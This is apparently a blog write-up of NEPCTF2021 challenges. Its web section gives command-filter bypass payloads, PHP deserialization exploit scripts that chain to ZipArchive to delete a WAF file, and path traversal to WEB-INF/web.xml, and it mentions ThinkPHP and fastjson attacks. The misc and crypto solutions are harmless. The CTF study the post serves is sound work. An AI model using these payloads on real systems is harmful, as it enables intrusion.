NEPCTF2021

web

little_trick

非常简单的命令执行绕过

image-20210616183310583

substr(0,-1)从最后开始过,

echo`nl%20*`;

image-20210616183318496

梦里花开牡丹亭

<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    
    public function __construct()
    {
        $this->username='user';
        $this->password='user';
    }
    public function __wakeup(){
        if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){
            $this->choice=new login($this->file,$this->filename,$this->content);
        }else{
            $this->choice = new register();
        }
    }
    public function __destruct() {
        $this->choice->checking($this->username,$this->password);
    }
}
class login{
    public $file;
    public $filename;
    public $content;
    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            $this->file->open($this->filename,$this->content);
            die('login success you can to open shell file!');
        }
    }
}
class register{
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            die('success register admin');
        }else{
            die('please register admin ');
        }
    }
}
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
            shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){
    @unserialize(base64_decode($_POST['unser']));
}

这个代码的链不难找

Game::wakeup->login::checking->Open::open

先看看shell.php里是些什么东西

exp1

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    
    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->register='admin';
        $this->file=new Open();
        $this->filename="php://filter/read=convert.base64-encode/resource=shell";
        $this->content="ls";
    }
}
class login{
    public $file;
    public $filename;
    public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));

?>

image-20210616183621605

发现里面有个命令执行绕过

而想要调用shell函数就必须要让waf.txt不存在

image-20210616183624731

搜索发现可以用原生类的同名函数open来进行删除

原生类讲解

ZipArchive::open

这个类可以将文件覆盖删除

exp2

<?php
class Game{
public  $username;
public  $password;
public  $choice;
public  $register;
public  $file;
public  $filename;
public  $content;

public function __construct()
{
$this->username='admin';
$this->password='admin';
$this->register='admin';
$this->file=new ZipArchive();
$this->filename="waf.txt";
$this->content=ZIPARCHIVE::OVERWRITE;
}
}
class login{
public $file;
public $filename;
public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));

?>

此时waf.txt已经删除

再命令执行绕过即可

n\l /flag

image-20210616183631892

fake_revenge

image-20210616183634919

下载下来发现是ThinkPHP框架,直接用payload打

image-20210616183637921

发现禁了一些函数

image-20210616183640842

发现能用passthru

cat flag即可

image-20210616183644553

easy_tomcat

进去发现要登录

image-20210616183649472

测试一波弱密码,sql注入,无果,扫下目录

image-20210616183652561

注册登录

image-20210616183655516

发现head_path参数,也许存在任意文件读取

image-20210616183659357

用绝对路径配合绕过

image-20210616183702708

static/img/../../WEB-INF/web.xml

而网页注释写了尝试admin image-20210616183709648

image-20210616183712589

读取LoginServelet.class,base64解码是这些玩意,看看InitServlet这个初始化

image-20210616183742728

image-20210616183728822

看到admin密码

admin/no_one_knows_my_password_75767388428345

进去发现有之前登陆的账号,并且可以删除

发现他传的是json的东西,而之前读取AdminServlet文件内容时,里面刚好有fastjson的东西

image-20210616183758392

image-20210616183802103

vn前不久刚出

https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501

绕过都没有

image-20210616183806945

image-20210616183814534

misc

签到

将数据循环二进制输出即可

# -*- coding: utf-8 -*-
# @File   : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date   : 2021/3/20 10:58
flag =[0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,0xffffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,0xe7ffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,0xfc7fffffffffffffffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
test=""
for i in flag:
    print("{:b}".format(i))

看图识字 image-20210616183826625

出题人日记

改为zip后发现字符

image-20210616183830326

凯撒密码

image-20210616183848034

搜索js图片隐写

js隐写

js隐写工具下载

解密这个图即可

image-20210616183850773

crypto

Real_Base

身为一个web狗,第一次做出了这种密码题还是挺开心的。虽然这题不难,题目给出了base64变种加密的源码,其实只要分析base64编码的原理,再去看他的代码,就很容易写出他的解密脚本

我已经在源代码里写了分析

# -*- coding: utf-8 -*-
# @File   : RealBase
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date   : 2021/3/21 19:34
# py2
import string
import random
# from secret import flag, b_char
print '123456'.zfill(10)
def encode(s):
    res = ''
    binstr = [bin(ord(s[i])).replace('0b', '').zfill(8) for i in range(len(s))]
    p1 = len(binstr) // 3
    p2 = len(binstr) % 3
    print binstr
    for i in range(p1):
        str_p1 = binstr[i * 3] + binstr[i * 3 + 1] + binstr[i * 3 + 2]
        tmp_str = [str_p1[x: x + 6] for x in [0, 6, 12, 18]]#以6位bit为一组,总共四组
        tmp_res = [b_char[int(x, 2)] for x in tmp_str] #将二进制转为十进制,十进制即为b_char字符的坐标
        res += ''.join(tmp_res)
    if p2:
        part2 = binstr[3 * p1:]   #取不满足3的倍数后面的几位数
        str_p2 = ''.join(part2) + (3 - p2) * '0' * 8   #补足0
        tmp_str = [str_p2[x: x + 6] for x in [0, 6, 12, 18]][:p2 + 1] #6位二进制为一组,
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]  #将二进制转十进制,十进制即为b_char字符的坐标
        res += ''.join(tmp_res)
        res += '=' * (3 - p2) 
        # print "p2",res
    return res
def decode(m):
    m = m.replace('=','')
    binstr=[]
    text=''
    for i in m:
        for j in range(len(b_char)):
            if i ==b_char[j]:
                text+=bin(j).replace('0b','').zfill(6)
    j=0
    for i in range(8,402,8):
        binstr.append(text[8*j:i])
        j+=1
    flag=""
    for i in binstr:
        l = 0
        for j in range(1,8):
            if i[l:j]== '1':
                flag+=chr(int(i[l:],2))
                break
            else:
                l+=1
                continue
    print flag


b_char = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
m1='rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P'
# print len(m1)
m = encode(m1)
decode("tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=")
# print encode(flag)
# print len("rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P")
# print len("2Br9y9fcu97zvB2OruZv0D3Bwhbj0uNQnvfdtC2TwAfPrdBJ3xeP4wNn0hzLzCVUlRa=")
# tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=

文章作者: penson
文章链接: https://www.penson.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 penson !
评论
  目录

梨花香-霜雪千年